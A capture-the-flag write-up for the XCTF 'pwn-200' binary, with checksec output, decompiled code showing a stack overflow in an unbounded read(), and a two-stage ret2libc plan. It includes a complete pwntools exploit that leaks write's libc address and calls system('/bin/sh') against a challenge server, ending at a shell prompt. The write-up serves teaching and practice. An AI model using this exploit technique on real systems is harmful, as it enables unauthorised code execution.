checksec
hunter@hunter:~/PWN/XCTF/xctf_challenge$ checksec pwn-200
[*] '/home/hunter/PWN/XCTF/xctf_challenge/pwn-200'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
基操
IDA
// IDA pseudocode of the pwn-200 entry point: builds the banner on the stack,
// prints it, then hands control to the routine that reads user input.
int __cdecl main()
{
int buf; // [esp+2Ch] [ebp-6Ch]
int v2; // [esp+30h] [ebp-68h]
int v3; // [esp+34h] [ebp-64h]
int v4; // [esp+38h] [ebp-60h]
int v5; // [esp+3Ch] [ebp-5Ch]
int v6; // [esp+40h] [ebp-58h]
int v7; // [esp+44h] [ebp-54h]
buf = 'cleW'; // multi-char constants stored little-endian, so the bytes in memory read "Welc"
v2 = ' emo'; // "ome "
v3 = 'X ot'; // "to X"
v4 = 'FTCD'; // "DCTF"
v5 = '5102'; // "2015"
v6 = '\n!~'; // "~!\n" -- the six words together spell "Welcome to XDCTF2015~!\n"
memset(&v7, 0, 76u); // zero the 76 bytes following the banner
setbuf(stdout, (char *)&buf); // stdout's stdio buffer is pointed at this stack buffer; the banner itself goes out via write() below
write(1, &buf, strlen((const char *)&buf));
sub_8048484(); // input routine; the unbounded read() in it is where the stack overflow is
return 0;
}
vulnerable:
// IDA pseudocode of the input routine: the source of the stack overflow.
// buf lives at ebp-0x6C, i.e. 108 bytes below the saved ebp and 112 bytes below
// the saved return address, but read() accepts up to 0x100 (256) bytes. With no
// stack canary (see the checksec output above) the excess bytes overwrite the
// return address. Bounding the read to the buffer's size would remove the defect.
ssize_t sub_8048484()
{
char buf; // [esp+1Ch] [ebp-6Ch]
setbuf(stdin, &buf); // stdin's stdio buffer is also pointed at this stack buffer
return read(0, &buf, 0x100u); // stack overflow: 0x100 bytes read into a buffer that starts 0x6C bytes below ebp
}
可用字符
LOAD:08048154 00000013 C /lib/ld-linux.so.2
LOAD:08048269 0000000F C __gmon_start__
LOAD:08048278 0000000A C libc.so.6
LOAD:08048282 0000000F C _IO_stdin_used
LOAD:08048291 00000006 C stdin
LOAD:08048297 00000005 C read
LOAD:0804829C 00000007 C stdout
LOAD:080482A3 00000007 C setbuf
LOAD:080482AA 00000012 C __libc_start_main
LOAD:080482BC 00000006 C write
LOAD:080482C2 0000000A C GLIBC_2.0
.eh_frame:080486B3 00000005 C ;*2$\"
二进制中没有 system、/bin/sh 或后门
思路
- 第一次攻击
- 栈溢出控制程序流程
- 利用 write 函数泄露某个函数的真实地址
- 返回到start
- 第二次攻击
- 利用泄露的真实地址得到libc版本
- 获取libc地址,system,/bin/sh
- 栈溢出,构造system函数
EXP
# Exploit script from the pwn-200 writeup (Python 2 / pwntools syntax).
# Stage 1: overflow the stack buffer in sub_8048484, return into write@plt so
#          the program prints write's GOT entry (its real libc address), then
#          return to the program's start so it re-runs and accepts a second input.
# Stage 2: identify the libc build from the leaked address and return into
#          system("/bin/sh").
# Mitigations that would have interfered are absent per checksec: no stack canary
# (the overflow reaches the saved return address) and no PIE (PLT/GOT/start
# addresses are fixed). The payloads contain only addresses, no injected code,
# so NX does not come into play.
from pwn import*
from LibcSearcher import*  # third-party: resolves a libc build from one leaked symbol address
context.log_level = 'debug'
elf = ELF('pwn-200')
start = 0x080483D0  # the "start" address the writeup returns to; fixed because the binary is not PIE
write_plt = elf.plt['write']
write_got = elf.got['write']
#sh = process('./pwn-200')
sh = remote('220.249.52.133',55272)
print sh.recv()  # banner "Welcome to XDCTF2015~!"
offset = 112  # buf is at ebp-0x6C (108 bytes) plus 4 bytes of saved ebp = distance to the return address
payload = 'A'*offset
payload += p32(write_plt)  # overwritten return address -> write@plt
payload += p32(start)  # write's return address -> start (program runs again)
payload += p32(1)  # write(fd=1,
payload += p32(write_got)  #       buf=&write@got,
payload += p32(4)  #       len=4)
sh.sendline(payload)
write_addr = u32(sh.recv(4))  # the 4 leaked bytes: write's address in the remote libc
print hex(write_addr)
print sh.recv()  # expected to be the banner again, printed by the restarted program
libc = LibcSearcher('write',write_addr)
libc_addr = write_addr-libc.dump('write')  # libc base = leaked address - symbol offset in the identified build
system_addr = libc_addr+libc.dump('system')
bin_sh_addr = libc_addr+libc.dump('str_bin_sh')
rop = 'A'*offset
rop += p32(system_addr)  # overwritten return address -> system
rop += p32(0xdeadbeef)  # placeholder return address for system
rop += p32(bin_sh_addr)  # system's argument
sh.sendline(rop)
sh.interactive()
结果:
Welcome to XDCTF2015~!
[+] ubuntu-xenial-amd64-libc6-i386 (id libc6-i386_2.23-0ubuntu10_amd64) be choosed.
[DEBUG] Sent 0x7d bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000070 40 b9 59 f7 ef be ad de 2b a0 6b f7 0a │@·Y·│····│+·k·│·│
0000007d
[*] Switching to interactive mode
$ ls